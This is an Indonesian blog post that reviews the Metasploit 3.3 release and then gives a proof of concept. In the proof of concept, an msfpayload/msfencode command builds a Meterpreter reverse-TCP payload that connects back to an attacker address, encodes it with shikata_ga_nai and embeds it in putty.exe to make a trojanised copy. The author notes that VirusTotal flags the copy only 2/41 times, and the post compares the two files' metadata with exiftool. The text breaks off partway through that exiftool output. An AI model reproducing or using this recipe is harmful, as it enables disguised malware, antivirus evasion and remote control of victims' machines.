Posted by kecoak on Nov 18, 2009 in
News,
Tools Review |
0 comments
.sudah 363 hari sejak release notes metasploit 3.2 beredar,kerja keras dari dev-team ataupun kontribusi dari para freelance, menyebabkan perkembangan framework API berbasis ruby ini cukup pesat,ya spirit of the open source pr0ject- .beberapa perubahan dalam release kali ini: — 123 new exploits,117 auxiliary modules. — dukungan terhadap ruby 1.9.1. — performance dan stability lebih baik,peningkatan dalam proses startup framework. — terintegrasi dengan OSVDB, exploit yang memiliki hubungan dengan OSVDB memiliki id referensi. — compatiblitas terhadap OS 32-bit ataupun 64-bit baik unix,mac OS,windows. — dukungan untuk JSP payloads, IPV6, NX dan DEP. — meterpreter mendukung screenshot,keylogger, ataupun packet sniffing. — msfencode dapat di embedded ke arbitry executables baik itu 32-bit ataupun 64-bit. .for more info metasploit’s 3.3 release notes. .masih ingat dengan artikel ini , meterpreter di encode XOR menggunakan shikata_ga_nai, dan lolos dari site virustotal. .berikut POC dari msfencode embedded to arbitry executables.
[email protected]:/pentest/exploits/framework3$ ./msfconsole / / / (___ (___ ___ ___ ( ___ ___ | ) )| |___)|___ |___)| )|___)| ) |__/ _/ |__ |__ __/ | | |__ |// / =[ metasploit v3.4-dev [core:3.4 api:1.0] + -- --=[ 448 exploits - 216 auxiliary + -- --=[ 262 payloads - 22 encoders - 8 nops =[ svn r7564 updated today (2009.11.18) msf > version Framework: 3.4-dev.7554 Console : 3.4-dev.7537 ——————————————–
[email protected]:/pentest/exploits/framework3$ ./msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.13.37 LPORT=443 R | ./msfencode -t exe -x /home/d0tz/putty.exe -o /home/d0tz/puttyw00t.exe [*] x86/shikata_ga_nai succeeded with size 102 (iteration=1) .hasil scan virustotal 2/41. .berikut merupakan hasil perbandingan metadata dari putty executable,
[email protected]:/pentest/exploits/framework3$ exiftool -a -u -g1 /home/d0tz/putty.exe ---- ExifTool ---- ExifTool Version Number : 7.89 ---- System ---- File Name : putty.exe Directory : /home/d0tz File Size : 444 kB File Modification Date/Time : 2009:11:08 22:36:28+07:00 ---- File ---- File Type : Win32 EXE MIME Type : application/octet-stream ---- EXE ---- Machine Type : Intel 386 or later, and compatibles Time Stamp : 2007:04:29 18:43:12+07:00 PE...